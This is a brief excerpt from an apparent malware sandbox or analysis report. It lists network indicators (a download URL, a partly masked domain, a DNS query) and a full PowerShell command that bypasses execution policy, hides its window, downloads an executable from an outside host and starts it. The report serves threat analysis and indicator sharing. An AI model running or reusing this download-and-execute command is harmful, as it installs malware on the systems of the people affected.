Technical Information
- https://www.gyokeritato.hu/agrooter/rfq/order.exe as p.order2.exe
- 'gy###ritato.hu':443
- DNS ASK gy###ritato.hu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://www.gyokeritato.hu/agrooter/RFQ/Order.exe','P.Order2.exe');Start-Process ...' (with hidden window)